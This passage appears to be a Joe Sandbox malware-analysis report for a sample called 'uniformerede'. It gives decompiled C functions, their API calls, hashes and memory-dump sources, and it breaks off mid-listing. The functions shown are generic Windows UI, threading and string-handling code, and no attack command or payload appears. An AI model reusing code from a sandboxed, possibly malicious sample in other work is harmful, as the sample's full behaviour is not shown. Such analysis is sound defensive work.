                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Load$AddressErrorLastLibraryProcString
                                                                                                                                                                                                                            • String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
                                                                                                                                                                                                                            • API String ID: 607613470-1314211545
                                                                                                                                                                                                                            • Opcode ID: 0fb2e029a58caf397494fbfab30ddf45661e2779c1fd900704d1bcdd82aa50c6
                                                                                                                                                                                                                            • Instruction ID: c181d5f6f94ff0715040a16c2373e5647a9c70682208e90bacd88f35eee9369f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fb2e029a58caf397494fbfab30ddf45661e2779c1fd900704d1bcdd82aa50c6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3218EF1904204AFCB00EFA5C885B9EB7F8E758314F11C97BE618E3291D77859008B99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00421A98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59threadsynchronizationwindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00421A98(void* __eax, void* __edi, void* __ebp) {
				struct tagMSG _v36;
				long _v40;
				void* _v44;
				void* __ebx;
				void* __esi;
				long _t12;
				long _t20;
				long _t29;
				signed int _t30;
				void* _t32;
				void* _t33;
				DWORD* _t35;

				_t32 = __edi;
				_t35 =  &_v40;
				_t33 = __eax;
				_v44 =  *((intOrPtr*)(__eax + 4));
				_t12 = GetCurrentThreadId();
				_t30 =  *0x49de40; // 0x49e034
				if(_t12 !=  *_t30) {
					WaitForSingleObject(_v44, 0xffffffff);
				} else {
					_t29 = 0;
					_t20 =  *0x49e854; // 0x220
					_v40 = _t20;
					do {
						if(_t29 == 2) {
							PeekMessageA( &_v36, 0, 0, 0, 0);
						}
						_t29 = MsgWaitForMultipleObjects(2,  &_v44, 0, 0x3e8, 0x40);
						_t30 = _t30 & 0xffffff00 | _t29 != 0xffffffff;
						E004218C0(_t33, _t30);
						if(_t29 == 1) {
							E004214B8(0, _t29, _t32, _t33);
						}
					} while (_t29 != 0);
				}
				GetExitCodeThread(_v44, _t35);
				asm("sbb edx, edx");
				E004218C0(_t33, _t30 + 1);
				return  *_t35;
			}















                                                                                                                                                                                                                            0x00421a98
                                                                                                                                                                                                                            0x00421a9a
                                                                                                                                                                                                                            0x00421a9d
                                                                                                                                                                                                                            0x00421aa2
                                                                                                                                                                                                                            0x00421aa6
                                                                                                                                                                                                                            0x00421aab
                                                                                                                                                                                                                            0x00421ab3
                                                                                                                                                                                                                            0x00421b14
                                                                                                                                                                                                                            0x00421ab5
                                                                                                                                                                                                                            0x00421ab5
                                                                                                                                                                                                                            0x00421ab7
                                                                                                                                                                                                                            0x00421abc
                                                                                                                                                                                                                            0x00421ac0
                                                                                                                                                                                                                            0x00421ac3
                                                                                                                                                                                                                            0x00421ad2
                                                                                                                                                                                                                            0x00421ad2
                                                                                                                                                                                                                            0x00421aec
                                                                                                                                                                                                                            0x00421af1
                                                                                                                                                                                                                            0x00421af6
                                                                                                                                                                                                                            0x00421afe
                                                                                                                                                                                                                            0x00421b02
                                                                                                                                                                                                                            0x00421b02
                                                                                                                                                                                                                            0x00421b07
                                                                                                                                                                                                                            0x00421b0b
                                                                                                                                                                                                                            0x00421b1f
                                                                                                                                                                                                                            0x00421b27
                                                                                                                                                                                                                            0x00421b2c
                                                                                                                                                                                                                            0x00421b39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00421AA6
                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421AD2
                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32 ref: 00421AE7
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00421B14
                                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 00421B1F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ThreadWait$CodeCurrentExitMessageMultipleObjectObjectsPeekSingle
                                                                                                                                                                                                                            • String ID: 4I
                                                                                                                                                                                                                            • API String ID: 1797888035-2364942553
                                                                                                                                                                                                                            • Opcode ID: b82a38332b8dd9ed48064de1bb5f76a85686ae63693f17ffa026617879459f65
                                                                                                                                                                                                                            • Instruction ID: 91e307cc55c87a5a0c16dfebb803382d4aeb1f0bf0ecfaa787b9004bec19efa9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b82a38332b8dd9ed48064de1bb5f76a85686ae63693f17ffa026617879459f65
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A11E130B043202BC610FAB99CC6F5E73D8AF65754F508A2AF254E72E1E679E804835A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458714 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00458714(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004586EC(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004079D0(SendMessageA(_t27, 0x84, 0, E00407A64(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                                                                                                                                                                                            0x00458714
                                                                                                                                                                                                                            0x00458714
                                                                                                                                                                                                                            0x00458718
                                                                                                                                                                                                                            0x0045871b
                                                                                                                                                                                                                            0x0045871d
                                                                                                                                                                                                                            0x00458723
                                                                                                                                                                                                                            0x00458798
                                                                                                                                                                                                                            0x00458798
                                                                                                                                                                                                                            0x00458725
                                                                                                                                                                                                                            0x00458725
                                                                                                                                                                                                                            0x0045872c
                                                                                                                                                                                                                            0x00458788
                                                                                                                                                                                                                            0x00458793
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045872e
                                                                                                                                                                                                                            0x0045872f
                                                                                                                                                                                                                            0x00458734
                                                                                                                                                                                                                            0x00458741
                                                                                                                                                                                                                            0x00458745
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00458747
                                                                                                                                                                                                                            0x0045874a
                                                                                                                                                                                                                            0x00458758
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045875a
                                                                                                                                                                                                                            0x00458781
                                                                                                                                                                                                                            0x00458781
                                                                                                                                                                                                                            0x00458758
                                                                                                                                                                                                                            0x00458745
                                                                                                                                                                                                                            0x0045872c
                                                                                                                                                                                                                            0x004587a1

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32 ref: 0045872F
                                                                                                                                                                                                                            • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 0045876A
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 00458781
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00458793
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1770779139-0
                                                                                                                                                                                                                            • Opcode ID: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                                                                                                                                                                                            • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b1cf324d5e8ab3e98f2e838186c1bf382b0abb02d5b530739333a6b4ef0cd78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00454268 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x454436);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0043AAC0(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x454444);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E004541DC(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0045152C( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E004541DC(_t150);
							} else {
								E004541DC(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454268
                                                                                                                                                                                                                            0x00454269
                                                                                                                                                                                                                            0x0045426b
                                                                                                                                                                                                                            0x0045426e
                                                                                                                                                                                                                            0x00454271
                                                                                                                                                                                                                            0x00454279
                                                                                                                                                                                                                            0x0045427c
                                                                                                                                                                                                                            0x0045438c
                                                                                                                                                                                                                            0x00454393
                                                                                                                                                                                                                            0x004543ab
                                                                                                                                                                                                                            0x004543ab
                                                                                                                                                                                                                            0x004543b0
                                                                                                                                                                                                                            0x004543b1
                                                                                                                                                                                                                            0x004543b6
                                                                                                                                                                                                                            0x004543b9
                                                                                                                                                                                                                            0x004543c0
                                                                                                                                                                                                                            0x004543d0
                                                                                                                                                                                                                            0x004543de
                                                                                                                                                                                                                            0x004543e6
                                                                                                                                                                                                                            0x004543ec
                                                                                                                                                                                                                            0x004543ff
                                                                                                                                                                                                                            0x004543ff
                                                                                                                                                                                                                            0x0045440a
                                                                                                                                                                                                                            0x00454411
                                                                                                                                                                                                                            0x00454414
                                                                                                                                                                                                                            0x00454417
                                                                                                                                                                                                                            0x00454420
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00454430
                                                                                                                                                                                                                            0x00454435
                                                                                                                                                                                                                            0x00454282
                                                                                                                                                                                                                            0x00454282
                                                                                                                                                                                                                            0x00454285
                                                                                                                                                                                                                            0x004542c5
                                                                                                                                                                                                                            0x004542d3
                                                                                                                                                                                                                            0x004542e1
                                                                                                                                                                                                                            0x004542f0
                                                                                                                                                                                                                            0x0045430c
                                                                                                                                                                                                                            0x0045432b
                                                                                                                                                                                                                            0x0045432b
                                                                                                                                                                                                                            0x00454330
                                                                                                                                                                                                                            0x00454333
                                                                                                                                                                                                                            0x00454287
                                                                                                                                                                                                                            0x00454287
                                                                                                                                                                                                                            0x0045428a
                                                                                                                                                                                                                            0x00454340
                                                                                                                                                                                                                            0x00454346
                                                                                                                                                                                                                            0x00454350
                                                                                                                                                                                                                            0x00454360
                                                                                                                                                                                                                            0x00454371
                                                                                                                                                                                                                            0x0045436d
                                                                                                                                                                                                                            0x0045436d
                                                                                                                                                                                                                            0x0045436d
                                                                                                                                                                                                                            0x0045437c
                                                                                                                                                                                                                            0x0045437c
                                                                                                                                                                                                                            0x00454290
                                                                                                                                                                                                                            0x00454293
                                                                                                                                                                                                                            0x0045443e
                                                                                                                                                                                                                            0x00454299
                                                                                                                                                                                                                            0x0045429a
                                                                                                                                                                                                                            0x004542a0
                                                                                                                                                                                                                            0x004542a7
                                                                                                                                                                                                                            0x004542ad
                                                                                                                                                                                                                            0x004542b0
                                                                                                                                                                                                                            0x004542b0
                                                                                                                                                                                                                            0x004542a7
                                                                                                                                                                                                                            0x00454293
                                                                                                                                                                                                                            0x0045428a
                                                                                                                                                                                                                            0x00454447
                                                                                                                                                                                                                            0x00454447

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 901200654-0
                                                                                                                                                                                                                            • Opcode ID: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                                                                                                                                                                                            • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b1a317fca31308ac4e10fac1f961552a80ef8e38a36b5d2d8db9195fd6bbfc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00410B94 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040F328();
					return E00410638(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040F784();
						_t113 = _t54;
						if(_t113 == 0) {
							E00410390(_t100);
						}
						E004109E8(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E00410B08(_v788 - 1, _t115) != 0) {
								L0040F79C();
								E00410638(_v792);
								L0040F79C();
								E00410638( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E00410B38(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F78C();
							E00410638(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F794();
							E00410638(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                                                                                                                                                                                            0x00410b94
                                                                                                                                                                                                                            0x00410ba0
                                                                                                                                                                                                                            0x00410ba6
                                                                                                                                                                                                                            0x00410ba8
                                                                                                                                                                                                                            0x00410bb2
                                                                                                                                                                                                                            0x00410bb9
                                                                                                                                                                                                                            0x00410bb9
                                                                                                                                                                                                                            0x00410bbe
                                                                                                                                                                                                                            0x00410bcc
                                                                                                                                                                                                                            0x00410d45
                                                                                                                                                                                                                            0x00410d4c
                                                                                                                                                                                                                            0x00410d4d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410bd2
                                                                                                                                                                                                                            0x00410bd5
                                                                                                                                                                                                                            0x00410be7
                                                                                                                                                                                                                            0x00410bd7
                                                                                                                                                                                                                            0x00410bdc
                                                                                                                                                                                                                            0x00410bdc
                                                                                                                                                                                                                            0x00410bf6
                                                                                                                                                                                                                            0x00410c02
                                                                                                                                                                                                                            0x00410c05
                                                                                                                                                                                                                            0x00410c72
                                                                                                                                                                                                                            0x00410c78
                                                                                                                                                                                                                            0x00410c79
                                                                                                                                                                                                                            0x00410c7f
                                                                                                                                                                                                                            0x00410c80
                                                                                                                                                                                                                            0x00410c82
                                                                                                                                                                                                                            0x00410c87
                                                                                                                                                                                                                            0x00410c8b
                                                                                                                                                                                                                            0x00410c8d
                                                                                                                                                                                                                            0x00410c8d
                                                                                                                                                                                                                            0x00410c98
                                                                                                                                                                                                                            0x00410ca3
                                                                                                                                                                                                                            0x00410cae
                                                                                                                                                                                                                            0x00410cb7
                                                                                                                                                                                                                            0x00410cba
                                                                                                                                                                                                                            0x00410cd6
                                                                                                                                                                                                                            0x00410cdd
                                                                                                                                                                                                                            0x00410ce8
                                                                                                                                                                                                                            0x00410cff
                                                                                                                                                                                                                            0x00410d04
                                                                                                                                                                                                                            0x00410d18
                                                                                                                                                                                                                            0x00410d1d
                                                                                                                                                                                                                            0x00410d30
                                                                                                                                                                                                                            0x00410d30
                                                                                                                                                                                                                            0x00410d39
                                                                                                                                                                                                                            0x00410cbc
                                                                                                                                                                                                                            0x00410cbc
                                                                                                                                                                                                                            0x00410cbd
                                                                                                                                                                                                                            0x00410cc3
                                                                                                                                                                                                                            0x00410cc9
                                                                                                                                                                                                                            0x00410ccb
                                                                                                                                                                                                                            0x00410ccd
                                                                                                                                                                                                                            0x00410cd0
                                                                                                                                                                                                                            0x00410cd3
                                                                                                                                                                                                                            0x00410cd3
                                                                                                                                                                                                                            0x00410cd6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410cd6
                                                                                                                                                                                                                            0x00410c07
                                                                                                                                                                                                                            0x00410c07
                                                                                                                                                                                                                            0x00410c08
                                                                                                                                                                                                                            0x00410c0a
                                                                                                                                                                                                                            0x00410c10
                                                                                                                                                                                                                            0x00410c12
                                                                                                                                                                                                                            0x00410c21
                                                                                                                                                                                                                            0x00410c22
                                                                                                                                                                                                                            0x00410c2c
                                                                                                                                                                                                                            0x00410c2d
                                                                                                                                                                                                                            0x00410c32
                                                                                                                                                                                                                            0x00410c3d
                                                                                                                                                                                                                            0x00410c3e
                                                                                                                                                                                                                            0x00410c48
                                                                                                                                                                                                                            0x00410c49
                                                                                                                                                                                                                            0x00410c4e
                                                                                                                                                                                                                            0x00410c69
                                                                                                                                                                                                                            0x00410c6b
                                                                                                                                                                                                                            0x00410c6c
                                                                                                                                                                                                                            0x00410c6f
                                                                                                                                                                                                                            0x00410c6f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00410c10
                                                                                                                                                                                                                            0x00410c05

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                                                                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                                                                                                                                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                                                                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 351091851-0
                                                                                                                                                                                                                            • Opcode ID: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                                                                                                                                                                                            • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0041CE2C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				void* _t71;
				char _t72;
				char _t73;
				intOrPtr _t88;
				CHAR* _t91;
				CHAR** _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;

				_t96 = _t97;
				_t98 = _t97 + 0xfffffff4;
				_v16 = 0;
				_t71 = __edx;
				_v8 = __eax;
				_t94 =  &_v12;
				 *[fs:eax] = _t98;
				E0041BEF0(_v8);
				 *[fs:eax] = _t98;
				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
				 *_t94 = E00404E80(_t71);
				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
					 *_t94 = CharNextA( *_t94);
				}
				while(1) {
					_t72 =  *( *_t94);
					if(_t72 == 0) {
						break;
					}
					if(_t72 != E0041CFA4(_v8)) {
						_t91 =  *_t94;
						while(1) {
							_t73 =  *( *_t94);
							if(_t73 <= 0x20 || _t73 == E0041CF8C(_v8)) {
								break;
							}
							 *_t94 = CharNextA( *_t94);
						}
						E00404AB0( &_v16,  *_t94 - _t91, _t91);
					} else {
						E004091D4(_t94,  &_v16, E0041CFA4(_v8));
					}
					 *((intOrPtr*)( *_v8 + 0x38))();
					while( *( *_t94) - 0xffffffffffffffe1 < 0) {
						 *_t94 = CharNextA( *_t94);
					}
					if(E0041CF8C(_v8) ==  *( *_t94)) {
						if( *(CharNextA( *_t94)) == 0) {
							 *((intOrPtr*)( *_v8 + 0x38))();
						}
						do {
							 *_t94 = CharNextA( *_t94);
						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
					}
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E0041CF65);
				return E0041BFAC(_v8);
			}
















                                                                                                                                                                                                                            0x0041ce2d
                                                                                                                                                                                                                            0x0041ce2f
                                                                                                                                                                                                                            0x0041ce37
                                                                                                                                                                                                                            0x0041ce3a
